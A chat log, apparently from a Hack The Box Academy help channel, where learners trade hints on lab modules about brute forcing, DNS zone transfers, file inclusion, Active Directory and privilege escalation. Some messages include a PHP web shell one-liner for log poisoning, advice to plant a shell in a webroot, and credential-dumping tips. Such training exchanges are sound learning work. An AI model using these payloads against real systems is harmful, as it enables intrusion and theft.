Windows Privilege Escalation Skills 1, I’ve gained a shell as IIS but no matter what I’ve tried I can’t find the ldapadmin password or escalate credentials… any hint ?
So I have been beating myself up trying to solve the 2nd question Skills Assessment:Website in the Login Brute Forcing module
You could DM me, i finished it last week with the help of jarednexgent
Have a look at the rights with ||whoami /priv||
Hey, working on Active Directory Attacking Domain Trusts from Linux. Need some help with dumping ntlm hashes. I really can't understand how to do it
Hey guys, im working on Password Attacks in the Password Reuse / Default Passwords section. I dont understand what the task wants me to do
There was a github link in this section with a list of default credentials for different services. If I am not mistaken there is a task about mysql. So you should search for the default password for mysql there
i'm on the same module and currently doing the mut_password.. do you have any idea which rule file will be suitable.. i used best64
so i have to download the list and use this list for passwords in hydra ?
nope, scroll to the top, you should see resources. there is a custom.rule file, passwords list and username lists. you will use it the whole module
no, there are 4 default passwords for mysql. just paste them manually
i thought as much using the custom file rule provided by HTB
thanks
np
with the user found in the section before ?
1 sec. i will check this module again
DM me please
I mutated the file password.list using the HTB provided custom file but hydra couldn't find the password corresponding to sam
plain password.list or mutated password.list, there are no more options)
and you need hashcat to crack hashes, not hydra
not hashes, SSH brute-force
oh sorry, my fault. the password is exactly in mutated list
Can you do the burp intruder module with zap ?
Wouldn't that defeat the purpose of doing the "burp module"?
I can't fuzz with burp
My machine freezes
it takes too much time
I did some portswigger modules and I did some fuzzing but here it takes too much time, my machine expires
Use pwnbox?
it still gives you the community edition
anyway
seems like I can't complete the zap fuzzing room either : (
with zap
You only need community edition to do it...
so I hear but I don't know
i let the fuzzing run for 2 hours and received nothing
they say the response is between 200 requests or something ?
I dont recall it taking that long
Hi guys 😊.. the question says: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.... It should be done with Subbrute but it's not working .. what to do
Domain name not showing anything, IP also not showing
Did you use the Target IP as DNS server?
How?
Do you mean I add this IP to the /etc/hosts
Add the IP to the resolvers.txt file
Okay I will try
Anyone able to help/nudge me with skills assessment - file inclusion? I'm trying to do log poisoning and the site doesn't return the logs after correctly.
Dm
@acoustic owl .. I have added it as you told me but still no results ... This tool is not working (Subbrute)
I get the bad gateway error on the Zap fuzzing module
Show me your command
@acoustic owl ./subbrute inlanefreight.htb -s ./names.txt -r ./resolvers.txt
Show me the Content from the Files names.txt and resolvers.txt
This file is so big
Shall I add domain name to name.txt
Try it like this:
||python3 subbrute.py inlanefreight.htb -s /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt -r ./resolvers.txt||
The file resolvers.txt contains only the target IP.
Hi, Need some technical help in one of the modules for cbbh:
File Inclusion - Log Poisoning
Whenever I try to spawn a machine, after a min the host becomes unreachable, after retrying for a few times getting 'target failed to spawn' error in htb
Are you sending tonnes of requests?
Nop, barely 2-3, but doesn't matter if I send any requests or not, after a min the ip becomes unreachable, then I have to spawn another box and so on
Hi all, is anyone else willing to jump off a bridge trying to solve the Flow Control - Loop in (Intro to Bash Scripting). I have spent days on this now and want to cry!!! I've added the for loop:
for i in {1..28}; do
var=$(echo $var | base64)
if [[ $i == 28 ]]; then
salt=$(echo $var | wc -c)
fi
done
I keep getting a bad decrypt error! Does anyone have any insight or ideas on this?
Someone can help me with DNS zones? I'm in the Active Subdomain Enumeration lesson (Information Gathering Web Edition Module), and I think I have a good grasp on the general concepts of DNS zones (after reading the lessons a gazillion times and doing hours of extra research on the internet), but I don't understand the application of the examples.
- I don't understand how to find out how many zones there are
- Because of that I don't understand when I'm in which zone
- I don't know what exactly the zone transfer transfers from where to where (in theory yes, but not with the examples)
I can't even tell you where exactly my confusion is but after dealing with the topic for hours I still have no idea how to apply what the lesson tries to teach me.
Anyone can help me with that?
Anyone found a solution to this problem?
I'm currently in the getting started. But whenever I attempt to connect with the smbclient I get the following error:
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
I have already tried changing the min and max protocol in the /etc/samba/smb.conf to min core and max smb3
It's for this one "List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file."
@gusty plover what tool are you using
smbclient
Can I DM you?
Sure
Can I get help on the skill assessment of Pivoting, Tunneling, and Port Forwarding? 🙂
Has anyone (or is taking) the Pentester or Bugbounty courses?
I am wondering which one to go and would like some input about your personal experience with it
anyone can help me with linux privilege escalation?
Hey, try asking by actually stating what your issue is, easier to help you instead of us trying to fish it out of you.
i need help with kernel exploit
Sure, but what is the actual problem?
I cant compile the kernel
I copy the exploit from a site and then load it up a txt
gcc kernel_expoit.c -o kernel_expoit && chmod +x kernel_expoit
used this command and i keep getting errors
Ok, so what are the errors?
the errors are saying something is wrong with the code
I copy the code from this website https://vulners.com/zdt/1337DAY-ID-30003
Try download the file, instead of copying the text, maybe you copied something wrongly
otherwise upload the thing you copied to pastebin or something and share it
It seems they have a "Copy To clipboard" button too
thats what I used
how do i upload img
use some screenshot tool
on Windows you can use Snippet (if you are running linux in a virtual machine)
im talking about into this chat. its not giving me option to
ah, maybe it is a rank problem
to prevent spam and such, maybe you need to approve yourself with the bot so you get the beginner rank
otherwise you can use this and just paste the output in there https://pastebin.com/
@wanton anvil what is the problem with the exploit
cant compile the kernel
it is not the kernel you are compiling, but the script that you download
yes what he said
you use the gcc command to compile the code (make it ready to be used)
and then with the chmod +x you tell your computer "You can run this piece of code, it has the proper rights"
you turn it into something that can be run on the computer
but it is difficult to help you without telling us what the error is exactly
it could be 1 of 1000000 things 😄
i sent you screenshot @tepid hemlock
hey i need some help with the introduction of the academy thing
https://academy.hackthebox.com/storage/modules/15/docker_target1.png
when i type the docker target it says that it took too long to respond and nothing happens idk what to do
ping me if you can help
repost
Hey Guys, can someone help me out with the Web Services & API module assessment? been stuck on it for a while now
Where are you pinging it from @jagged radish ?
firefox
it says to open firefox and to see what happens ig
im using the workstation provided @tepid hemlock
I am not sure, I would try check to see if the docker container is even running
how
That part you can google, just google how to check if docker container running
hi im working on Footprinting MSSQL and already got inside SQL. but i dont know what command to see what information i need to get for this question, can you guy help? thank youuu
Hey Timo, the keyword is the "non-default database" google on that a bit
Unrecognized options or missing extra parameters in xyz.ovpn:12: data-ciphers-fallback
This is the error I got when connecting to htb can someone help me connect my machine
try run it as sudo
i will hack you 😈
Ok…
Not sure this is the right channel to state that
Though
Not helping
Hey, I'm doing the Getting Started module (Privilege Escalation rn) and cannot save anything on the pwnbox machine. How can I save a file there? Neither vim nor editor are working
Nano?
Can I paste from system clipboard to nano?
did you change directories?
ctrl-shift-v will typically paste in linux. Yes, we can copy/paste to and from Nano 😉
By default on the pwnbox you're in /root and won't have permission to write without sudo
You should though I normally use vim
Unrecognized options or missing extra parameters in xyz.ovpn:12: data-ciphers-fallback
This is the error I got when connecting to htb can someone help me connect my machine
Anyone>?
Hey mate. I think you should use a command line client for accessing the MSSQL with the provided credentials and then you can google how to list databases in MSSQL with the client you're using
My problem solved, thanks guys
someone knows how can i leave this window on hackthebox machine?
Unless you happen to remember the random generated password from the desktop I doubt you can do much except shut it down and boot up a new one (unless a empty password works)
so bad(( need to do 1000000 steps to restore my progress
ive never had this happen to me before. Did you accidentally (or intentionally) lock your screen?
I moved to my native language, then again to english, pressed L and that happened( Don't recommend doing this when you are working on academy)
Windows Key (or special key) + L usually locks the screen. Maybe that combo triggered
probably yes
I'm not sure what your current setup is but in the future you could use the VPN setup. You'd be responsible for downloading and setting up the tools on your own PC though.
i know, but thanks)
Update your user_init to uninstall the lockscreen on the pwnbox :D
sounds like a hacker's way to solve this problem)
Hey Guys
I'm stuck at the Broken authentication - predictable reset token
Following the instructions and using the php code that is there I'm not even able to get the same hash as the htbuser
I'm on the web proxy module. I need to enable a button on a response. I can see it's working and the hint says it won't give the flag on the first click. I've tried to send it to the repeater in zap but only get the request and can't modify the response to enable the button like I can with zap. What am I supposed to do
x.x
Can someone please help me out with the Web Service and API assessment?
hacking for me is a little hard
i have 10 years trying to hack
and i never get to hack a shit
can you teach me to hack??
Hello someone can help me with a hint in the Skill Assessment - Broken Authentication? I have some information (credentials)
were you able to get logged in as the ||support.xx|| user?
yes in the x number of accounts
where xx ||is a country code||
yep, i found some accounts and i get access in each since I got the passwords. I imagine the next step is to decode the session cookie, but I can't find the formula
i found the way to decode the cookie i miss the ":" is the key jejeje
Finally I was able to finish the module, thank you very much for the hints. In the end, I just needed to think outside the box hahaha
Hi guys, I'm stuck on the CROSS-SITE SCRIPTING (XSS) Session Hijacking module. Any advice or step to complete the activity in the pwnbox.... :'v
Hello, can anyone give a hint for the module AD Enumeration & Attacks - Skills Assessment Part II, to do the priv esc for the MS01 , Do I need to use some the creds from previous question (SQL01)?
Still working on the Brute Force Login, 2nd assessment and I found out that by reading the hint for the 1st question is correct. I ran it through Metasploit and got a correct hit
You can use ||Mimikatz on SQL01|| to find credentials
Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com
Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...
and if you are wondering yes google.com is the best hacking site
This is going to become the auto reply message for teach me to hack and so on messages @vital adder 😅
I'm stuck on that task, help me please. Find all bad characters that change or interrupt our sent bytes' order and submit them as the answer (e.g., format: \x00\x11). i used as the answer \x00\x09\x20\x67 not working
stupid issue i am having. its probably something stupid.
cant Ffuf for sub-domains/vhosts anymore.....
I have refreshed the servers many times over but no joy.
Add given IP minus the port to hosts file.
sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'
Ffuf command:
ffuf -w SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://FUZZ.academy.htb/ -H 'host: FUZZ.academy.htb'
All i get is errors........................ help please?
Dm
fixed. Upper case error haha. Thanks all.
any references ?
Why do I get connection refused errors on zap intruder module ?
sounds like you arent hitting the website? has the IP timer expired on the academy website?
no
until now everything was fine
I used the provided parrot os and ping it
still doesn't work
i would refresh the server IP personally just to see. every time this has happened to me this method fixes it.
i DM and will try to help as i finished this module but no promises on a fix. 🙂
ok
not an academy-module, but a burning question:
- there is a server, only port 21 ftp open
- i have found the root password
- BUT i need the local user password
- got the shadow& passwd, but there are no hashes of the users. only root.
--> How to get passwords/hashes of the other users 😮 ?
if its authing against a remote server, there wouldn't be hashes I believe.
Somehow... there must be a way, so that i can answer the question
already tried to get a reverse shell by changing the crontab file, no success.
@rustic sage did you look in /etc/shadow file
sure. downloaded shadow + passwd,
did "john unshadow" and tried to crack it. no success, of course, because there are no password hashes in the unshadow file.
did you actually look at the shadow file to see if there are hashes?
From that description, it could equally be that john failed to crack the hashes

kevinsmith:!:16497:0:99999:7:::
! instead of hash, that happens if user is locked/ no password given.
Still dont know how i can answer the question, "whats his password? choose a, b, or c"
Hello Guys
i try to solve the
Shells and Payloads Live Engagement part
I have to use the noMachine program but i get a timeout every 20 seconds or 3 commands : (
I tried to change the vpn connection but the Issue is still there
I can't get a connection to the IP from the Zap fuzzing module
I am now using the pwnbox
On my local device is the same even with their VPN
on the "Active Infrastructure Identification", i am stuck on where to add the vhosts. if anyone could give me a hand would be greatly appreciated
I'm on the web proxy assessment I've found how to enable the button but the hint says I need to make it so the button can be clicked multiple times I'm a little lost on how to accomplish that can anyone just point me in a direction to look in?
Try it with the Burp ||Repeater||
who has finished Intro to assembly language I am stuck at the final assesement https://academy.hackthebox.com/module/85/section/909
Hey, can someone help with Active Directory Assignment 1 last question?
hey guys, how i can send commands to the ftp server in the pwnbox
got this weird 200,150,226 message
@leaden quail maybe that person has no access
Anyone indian plz inbox me
Which Active Directory module? There are 5 modules
Problem solved for me ☺️
Just put the IP in the normal browser not in the proxy
Active Directory Enumeration and Attacks
hey can anyone help me with Wordpress structure, finding the flag using directory traversal? I feel like i've looked in every directory and still no flag
feel free to dm me
Plz help me htb plz provide free account I share my tryhackme account 7month premium subscriptions
Those are just return codes, look up "FTP server return codes", Wikipedia has a list
@west canopy.. please help me .. I got stuck in one MFFFF Question for two days now
This MF
Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
Is there a general channel somewhere or am I crazy? I just want to thank the HTB academy team for their hard work. The level of training being provided is leagues ahead of anything else I have seen as a beginner in the field and am extremely thankful. ❤️
@lapis pivot do zone transfer
Alright will check
Has anyone here completed the hacking wordpress module?
Hey, could i DM someone about the last question of the Skills Assessment of Pivoting, Tunneling, and Port Forwarding module? I feel i'm really close but something's missing...
Hey, I'm doing the Windows Fundamentals skill assessment and I got the last two questions right by swapping the user SID for the group SID and vice versa
I'm not sure if I did the steps wrong or if the questions are wrong
yes
hey sk4reKr0w, thanks for responding, I'm stuck on the Wordpress structure /file structure section. I believe I have checked all the core directories and their content, but still have not seen the flag.txt
there are no questions in that section. Unless they updated it
someone knows how to use time verter?
oops, I meant, the Directory Indexing section.
@lethal atlas hey coincidentally I JUST found the flag. But I appreciate the response..
excellent work.
?? time verter??
yup it's a tool made to crack reset tokens
maybe it's useful for someone
@placid quest I did Zone transfer by using dig AXFR and i used another tool called fierce but still not getting any results from inlanefreight.htb server
@lapis pivot do on internal.inlanefreight.htb
How
Add internal?
@lapis pivot use dig axfr internal.inlanefreight.htb ip address
@placid quest I used dig AXFR internal.inlanefreight.htb 10.129.186.211
nothing happened
I was stuck at the exact same question hehe
It's saying transfer failed
It's a MF question
Thank you sir
@lime moth okay I will try
Hehe i know. Since the internal.inlane blabla is not showing up when bruteforcing subdomains with a wordlist that contains the word "internal"
No result
@lime moth please no spoiler , you guys can continue on DM
having little problem getting 'sam' password / PASSWORD ATTACK MODULE
Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer.
anyone finished the documenting and reporting module? I'm stuck on the part where it asks what keybinds are used in TMUX to split panes vertically
even though I know it lol and match the format they ask for lol
apparently its supposed to be like [key] + [key] + [key] where you replace key. but it doesn't work for me. not sure why
Hi @spare condor , could you solve it? I got the same issue
anyone completed common services easy that i can get some help from? i have uploaded php shell to the portal via the upload function but clueless after that
once we ||plant a php shell in the webroot, we should have code execution on the machine. After that it's just a matter of reading the flag.||
Hey guys, I am stuck in the broken authentication module in predictable reset token question 2. I found the encoding algorithm for htbuser but I don't know what to do next and how to request a reset token for htbadmin to force a password change.
NVM guys, I got it. It's very easy.
Don't go to the #general channel
It is super annoying
Can someone help me out with Hacking Wordpress assessment. I have the flag for all questions except "Use a vulnerable plugin to download a file containing a flag via an unauthenticated file download".
Hello, I was wondering if someone could give me some hint about ||what to do with the ability to perform log poisoning in the last question of the File Inclusion module? I have been stuck at it because my payload gets detected by probably a firewall of some sort, but I tried to encode the payload in base64. It works, the base64 code is added to the log file, but how could I execute it next? I have also tested URL encoding the payload but that didn't work out|| Module: File Inclusion
if your payload has double quotes then use single quotes something like this ||<?php system($_GET['cmd']); ?>|| and also are you on the skill assessment? if you are i don't think there is any firewall
try scanning the site with wpscan but with a api key i did note down the wpscan may not be able to find the vuln or you can search the vuln name in that question on exploit-db and look for wordpress plugin
Yeah I'm on the skill assessment
|| Whenever I send the payload in the User-Agent header (I also tried other headers just in case), the file is blocked and new input is ignored ||
||I just tried sending it with single quotes and the result is the same, that's why I assume there's a firewall||
which log file did you try to inject?
|| access.log located in /var/log/nginx ||
oh i don't think new input is ignored if you inject the wrong thing into the log file the system will crash
yeah that look right
can you send me a screenshot of your payload in burp?
Sure, wait a second
Hey Guys
Can I get a hand with the broken authentication - Cookie Brute-forcing
I got my script ready and tried many different lists, the only hint I got for the ||role|| is super admin
Tried many lists from seclists and even used cupp to get another list
I just DMed the screenshot to you
@woeful oxide reread the question the role is in the question
Thanks! I will try this!
i just scanned it with wpscan without the api it didn't find anything even with the api it only shows you that cve under ||Multiple Issues|| and there are multiple cve there so i think you should just look for the vuln on exploit-db.
ahhh ok gotcha! That is the one vuln set that I didnt look into. Ill try that. Thanks!!
anyone can provide hint for me on "Attacking Enterprise Networks - External information gathering" - What is the FQDN of the associated subdomain? I don't quite understand the associated subdomain part - FQDN is fully qualified domain name, but not sure what is being asked
click the cancel button on the login page to leave it
that's literally any domain name
Hi, I'm doing the Getting Started knowledge check. However after getting reverse shell I cannot use almost any linux commands. Even id is not working. Says it unknown command. Anybody can give me a nudge why is that? I can't upgrade TTY also, because python is also unknown
What's funnier -> ls -l | grep something works (for perfect match) grep alone returns Unknown command: grep
sorry, it's unclear to me. Already tried multiple domain and combination but still not accepted
check the path? check if you can run /usr/bin/grep
You mean ./usr/bin/grep? Also unknown command
without the dot in the beginning
Same :/
can you check if grep exists? ls /usr/bin/grep
or echo /usr/bin/grep
just want to make sure the path is correct (it's on /usr/bin/ on my system)
Echo is also unknown -.- But when I navigate to /usr/bin there is grep there
I'm not sure what happened... someone more knowledgeable probably can help... but I suspect you are not running proper shell?
try to restart the reverse shell?
I tried restarting. I used Metasploit to get the reverse shell. Haven't upgraded TTY because I cannot run python (even though it is under /usr/bin)
Yeah, maybe I'll try again later
can someone tell me the best place to learn networking
i get "zsh: parse error near `do'" when i copy the code given in Server-side Attack module SSRF exploitation example
I changed the IP for the target IP
Hi all, somebody working on Linux privilege escalation module? I’ve only found flag2 and flag5 I may need a nudge
can anyone help how to get the code working?
copy pasting the code does not work on pwnbox or on my VM
Anyone else having problems with the File Inclusion Skill Assessment box? I have to respawn several times until it works, and if it works, it runs out of time very quickly.
hey guys... i'm stuck in server side attack module in "Nginx Reverse Proxy & AJP" . i have set up nginx server as shown in the module and all works without error but when i curl to my localhost i don't get the tomcat page but get my nginx page and i don't know how.... can anyone help me please??
I am doing a scan to see the version of the port 8080 but there is nothing, the module is "Getting Started" > Service Scanning.
Hi all! I am so so stuck on "What is the FQDN of the host where the last octet ends with "x.x.x.203" ?" in the footprinting DNS part. Any1 that could help me out? Found the 2 transferable zones, tried to dig everything but without success.
Remember that there are also servers that do not allow zone transfers from everyone.
Has anyone finished secure coding skills assessment? I need some help with 4 reverse. I believe I have fixed what's wrong with the code but no flag.
Active Subdomain Enumeration:
I cant seem to use nslookup on the target, i get this error returned
** server can't find ....in-addr.arpa: NXDOMAIN
Sort of Noob with Linux here, I just started the "Linux Fundamentals" module (Service and Process Management section) and I am trying to start the ssh server. I have installed openssh-server already. When I try to start it, it is asking for a password to authenticate and I can't find the password (The Instance within the module). Where can I get it to continue? I have tried nothing and also my HTB password, and also tried to change the password but no luck. Please direct me to what I should be doing.
If someone can.
@brazen saffron what is the problem
^
for the Active Subdomain Enumeration module, has anyone has issues resolving the ip. i can ping the target but cant seem to get a response with nslookup. any advice would be greatly appreciated
I got it. My bad.
so found out that dig works but nslookup returns nxdomain? can anyone explain why this happens? will post ss soon
Hmm thanks! Will think about that 🙂
You also need to tell nslookup which DNS resolver you want to query.
A public resolver like 1.1.1.1 cannot resolve htb as a toplevel domain.
i dont think ive ever done a zone transfer with nslookup
im just following the course...
yea the directions in this section are kind of unclear
everyone get stuck on that section. i got stuck on it haha
yep so you already did the first zone transfer, try doing|| the same thing against some of the subdomains you discovered||
that would be the IP address in your dig command, that stays the same
the IP of the DNS resolver
i probably did a terrible job of explaining as well lol
np let me know if you get stuck
Etc
Literally just any domain name with a dot
Hey, stuck on Active Directory Enumeration & Attacks Assignment 2 question 4. Would appreciate a nudge
||Crackmapexec|| is your friend
Like getting users and make password spraying?
Yes
thanks
Already tried this but it's not accepted
going through the web attacks module
in Mass IDOR enumeration part I have one doubt
the request that is getting passed is a post request and the uid is also visible when we check the request with burp, but unable to run script in similar way as mentioned in the resources
current command looks like
curl -X POST -s "$url/documents.php" -d '{"uid": $i}' | grep -oP "/documents.*?.txt
not sure about the -d part as it's for post data
comments?
Send me DM
Can I ask you what tool did you use to connect to sql server? Trying to install sqsh, but there no candidates to download. Also sqlcmd for linux, but it doesn't work with proxychains
Do you use Parrot?
You can download sqsh here: https://pkgs.org/download/sqsh
Or you can use Impacket/mssqlclient.py
https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py
Ok, will try impacket tool, thanks again
Hello guys , Does anybody know how to use grep to get all the words that start with capital letters?
It worked! Thanks a lot
Glad it worked. When I need to test regex: https://regex101.com/ 🙂
cool thanks
Hello!! would anyone be willing to help me out with sql injection fundamentals module . specifically the using comments section. something is just not clicking..
Forget it, I could! It's not the TXT that says HTB{...} but the one that says another thing, and it's in another subdomain. This was a tricky one
I sent you a DM if still need help
Hey all, I'm stuck on ACTIVE DIRECTORY ENUMERATION & ATTACKS ACL Enumeration, last question. What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word). I got the other answers with bloodhound, but I think I need to run the Get-DomainObjectAcl command for this one. but it just freezes and hangs when I run the command. Could someone help me out? nvm, I figured it out. ^_^ if anyone else has a question about this one dm me.
for anyone stuck on this: so in bloodhound it's called add self, right? Try running Find-InterestingDomainAcl with the -ResolveGUIDs flag set. Stop it after a bit and start going through the output and look for anything that might be similar to bloodhound's "add self".
I'm respawning the Skills Assessment File Inclusion machine about every two minutes now. This is so frustrating. Can somebody please fix that? 😡 😡
The minute counter goes down one minute every couple of seconds...
Still stuck on "What is the FQDN of the host where the last octet ends with "x.x.x.203"?" I tried to zone transfer and enumerate every record that I found in the 2 zones. Any1 has more tips for me?
Not every server allows zone transfer from everyone
if you need further help, DM me
Someone can help me a little with the Session Security Skill Assessment? I think I understand the concepts behind the module, but what I don't get is how do I get the admin user to trigger possible payloads. I know it has something to do with the API, but I have no idea how to proceed, since nothing about that is mentioned in the lectures (except from "think outside the box" haha, very helpful).
Anyone can give me a nudge where to start? Everything I tried with the strategies from the lessons seems to be a dead end.
Hello, I am stuck in the last question of Linux Fundamentals,
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
Can anyone help me please?
Hey, what CLSID do we need to use to exploit ||JuicyPotato|| in Active Directory Enumeration and Attacks module Assignment 2?
Hey, i'm having issue to submit answer in Network Enumeration with Nmap for the medium lab, can someone help me ? 😁
if you use what you learned in the XSS section of the module it will get you there.
Yeah, I have read that juicypotato and rottenpotato doesn't work for windows version of this assignment. Can someone give a hint what to do next, after getting info mssql?
I can assist you
Has anyone done the Intro to Assembly Language module?
I am stuck on the skills assessment. I have pulled the shellcode from the file, decoded as 32bit but I dont recognize some of the commands being used.
** listening to the crickets lol
Good afternoon, everyone
if you could just point me in the right direction.
I have decoded it as 32 bit and 64 bit. Which way is correct? In 32bit I see a bunch of commands I dont recognize
Anyone have any hints or recommendation on the DNS section of the footprinting module? Stuck on the last question where you have to find the FQDN of a certain IP.
I'm on the web proxy assessment the third flag says to take the decoded cookie from the last question then try and fuzz for the last character. I'm pretty sure I have the setup right bc I'm getting the 88 characters and it looks like the original request cookie but I've tried all 62 outputs and get wrong answer for all of them can anyone help me out do I need to run those results through an MD5 hash to submit them
Solved it
DM me and we can discuss it in detail
im being dumb again>>>>
Linux Privilege Escalation - Privileged Groups.
Can i DM someone a question about this please? Contains a potential spoiler so i dont want to ask it in public.... im lost af.
Hey, any reason why nslookup wont work trying to find a nameserver but dig will?
depends on how you have the command crafted
Good luck with tier 3 help. I have been trying to get help with assembly for like 2 weeks lol

